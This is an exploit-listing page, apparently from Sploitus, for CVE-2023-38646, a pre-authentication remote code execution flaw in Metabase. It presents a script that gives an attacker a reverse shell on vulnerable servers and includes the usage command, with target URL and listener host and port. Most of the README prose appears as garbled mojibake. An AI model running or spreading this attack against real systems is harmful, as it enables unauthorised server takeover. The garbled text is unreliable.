Sploitus

Exploit for CVE-2023-38646

kitploit ┬╖ 2026-09-03

Exploit Code

MARKDOWN24 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BIRDM4NW-CVE-2023-38646
# CVE-2023-38646 - Metabase RCE

0.46.6.1 рд╕реЗ рдкрд╣рд▓реЗ рдХрд╛ Metabase рдУрдкрди рд╕реЛрд░реНрд╕ рдФрд░ 1.46.6.1 рд╕реЗ рдкрд╣рд▓реЗ рдХрд╛ Metabase Enterprise рд╣рдорд▓рд╛рд╡рд░реЛрдВ рдХреЛ рд╕рд░реНрд╡рд░ рдкрд░, рд╕рд░реНрд╡рд░ рдХреЗ рд╡рд┐рд╢реЗрд╖рд╛рдзрд┐рдХрд╛рд░ рд╕реНрддрд░ рдкрд░, рдордирдорд╛рдиреЗ рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИред рд╢реЛрд╖рдг рдХреЗ рд▓рд┐рдП рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЖрд╡рд╢реНрдпрдХ рдирд╣реАрдВ рд╣реИред рдЕрдиреНрдп рдлрд┐рдХреНрд╕ рдХрд┐рдП рдЧрдП рд╕рдВрд╕реНрдХрд░рдг 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 рдФрд░ 1.43.7.2 рд╣реИрдВред

рдпрджрд┐ Metabase рд╕рдВрд╕реНрдХрд░рдг рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд╣реИ, рддреЛ рдпрд╣ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЖрдкрдХреЛ рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рд░реВрдк рдореЗрдВ рд▓рдХреНрд╖реНрдп рд╕рд┐рд╕реНрдЯрдо рдкрд░ рд╢реЗрд▓ рдХрдиреЗрдХреНрд╢рди рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрдЧреАред

# рдЙрдкрдпреЛрдЧ

root@kitploit:~
    
    
    python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT
    

# рдЙрджрд╛рд╣рд░рдг

![scriptCapture](https://assets.kitploit.com/production/public/readmes/23331/748fad7154b9b1a6de31bfa3099f11ca4eacca88e858503d6ed4f93c00e5732f.png)

**рд▓реЗрдЦрдХ:** @birdm4nw

# рд╕рдВрджрд░реНрдн

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/